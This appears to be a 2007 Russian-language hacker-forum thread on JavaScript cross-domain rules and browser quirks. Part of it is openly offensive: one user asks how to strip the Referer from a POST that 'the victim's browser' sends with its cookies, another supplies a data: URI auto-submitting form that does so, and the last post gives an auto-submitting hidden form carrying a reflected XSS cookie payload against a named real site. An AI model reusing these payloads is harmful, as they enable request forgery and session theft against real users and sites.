28.11.2007, 00:07
|
|
Новичок
Регистрация: 14.07.2007
Сообщений: 29
С нами:
9909403
Репутация:
10
|
|
Сообщение от DIAgen
Не как, зашита встроенная в браузеры...
Я понимаю.... если защита от загрузок с другого сайта из другого. Но если сам JS-скрипт находит...
*на этом моменте я понял почему запрещено*
потому-что кто-то может подключить JS с другого сайта в котором с этого же сайта берутся страницы... вот...
Я, кстати, подключаю скрипт с компа. c localhost'a. А если с диска C: ? там вроде на файловой системе компьютера нет ограничений...
|
|
|
28.11.2007, 00:26
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
С нами:
9840758
Репутация:
808
|
|
Сообщение от Loopy
*на этом моменте я понял почему запрещено*
потому-что кто-то может подключить JS с другого сайта в котором с этого же сайта берутся страницы... вот...
Нет, как раз JS действительно можно подключать с любого другого домена, но исполняться он будет в контексте безопасности именно той страницы, где он был "подключён". Односторонняя такая защита.
|
|
|
|
28.11.2007, 00:37
|
|
Новичок
Регистрация: 14.07.2007
Сообщений: 29
С нами:
9909403
Репутация:
10
|
|
Сообщение от astrologer
Нет, как раз JS действительно можно подключать с любого другого домена, но исполняться он будет в контексте безопасности именно той страницы, где он был "подключён". Односторонняя такая защита.
А я и не говорил, что нельзя подключать скрипты с других сайтов. Я говорил, что AJAX и хирургический доступ к фреймам в таком скрипте, который подключается, абсолютно исключены системой безопасности доступа к страницам. Как к доступу к страницам подключаемого, так и к которому подключаем.
Объясню.
Так как, исполняемый скрипт может брать страницы через Аякс со своего домена. Неужели браузеры позволят сайтам подключать сторонние скрипты и использовать то, что они подключают свои страницы? Тырить контент можно.
Почему не может брать страницы от сайта к которому подключается? Да потому, что злоумышленник на сайте которого храниться код может его переделать и загрузать страницы первичного сайта к себе на сайт.
В таком случае, в подключении сторонних кодов, AJAX и какой-либо доступ к фреймам исключены.
Последний раз редактировалось Loopy; 28.11.2007 в 00:41..
|
|
|
|
28.11.2007, 23:06
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
есть <select id='mda'></select>
добавляю document.getElementById('mda').innerHTML = '<option value="">123</option>';
почему это не работает в ИЕ?
p.s. меня не интересует как сделать по другому.
|
|
|
|
29.11.2007, 17:02
|
|
Новичок
Регистрация: 14.07.2007
Сообщений: 29
С нами:
9909403
Репутация:
10
|
|
Сообщение от GreenBear
есть <select id='mda'></select>
добавляю document.getElementById('mda').innerHTML = '<option value="">123</option>';
почему это не работает в ИЕ?
p.s. меня не интересует как сделать по другому.
В ИЕ, чтобы иннерить нужно присутствия каких-нибудь символов между тегами в которые вставляем..
|
|
|
|
29.11.2007, 18:48
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
С нами:
9840758
Репутация:
808
|
|
Сообщение от GreenBear
есть <select id='mda'></select>
добавляю document.getElementById('mda').innerHTML = '<option value="">123</option>';
почему это не работает в ИЕ?
p.s. меня не интересует как сделать по другому.
Потому, что это баг IE.
В ИЕ, чтобы иннерить нужно присутствия каких-нибудь символов между тегами в которые вставляем..
Нет.
как загружать от одного сайта но от другого поддомена?
Если два разных поддомена - то нельзя. Возможно тогда и только тогда, когда со страницы "sub.site.com" нужно получить доступ к "site.com". В этом случае можно установить document.domain = 'site.com' и работать с ним. Обратно в пределах одной сессии изменить уже нельзя.
|
|
|
|
30.11.2007, 18:46
|
|
Новичок
Регистрация: 27.12.2005
Сообщений: 7
С нами:
10721698
Репутация:
1
|
|
Как скрыть рефа у юзера?
Через window.location или document.location - эт понятно... хотя у меня опера передает рефа любым путем, даже если создается поп-ап окно без адреса и т.п.
А если это будет POST запрос ???
Типа:
<form>
.....
</form>
<script>submit();</script>
Блин, ужо неделю ломаю голову...
Причем надо учесть, чтобы именно браузер жертвы отправил запрос, т.к. проверяется сессия или куки...
Мож кто знает лучше метод, как избавиться от рефа юзера в POST запросе ????
Последний раз редактировалось bot; 02.12.2007 в 02:34..
|
|
|
|
02.12.2007, 22:44
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
С нами:
9840758
Репутация:
808
|
|
Сообщение от bot
Мож кто знает лучше метод, как избавиться от рефа юзера в POST запросе ????
Хороший вопрос. После непродолжительного исследования получилось следующее:
PHP код:
---
<script type="text/javascript">
var info = '123';
document.location.href='data:text/html;,\
<body onload="document.forms[0].submit()">\
<form method="POST" action="http://2ip.ru">\
<input name="info" type="text" value="' + info + '" />\
</form>'
</script>
---
Так можно скрыть реферер в Опере и FF. IE не понимает схемы "data:", для него можно создать окно и в нём - форму.
|
|
|
|
29.11.2007, 16:21
|
|
Новичок
Регистрация: 14.07.2007
Сообщений: 29
С нами:
9909403
Репутация:
10
|
|
astrologer
Блин, респект. Получается. Проблема была в том, что страница, которую хотел получить, назодилось в поддомене..
из поддомена загружается только от этого поддомена.. как загрузать от одного сайта но от другого поддомена? 
|
|
|
|
29.11.2007, 16:44
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами:
10787366
Репутация:
2277
|
|
я делал так автоматический пост
Код HTML:
<form name="postform" action="http://rechitsa.by/index.php" method="POST">
<input type="hidden" name="search_string" size=20 value="><script>alert(document.cookie)</script>">
<input type="hidden" src="/images/search.gif" alt="Поиск"/></td></tr>
<select name="search_cat" type="hidden">
<option value="all">весь сайт</option>
<option value="articles">статьи</option>
<option value="news">новости</option>
</select>
</form>
<script>document.postform.submit();</script>
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
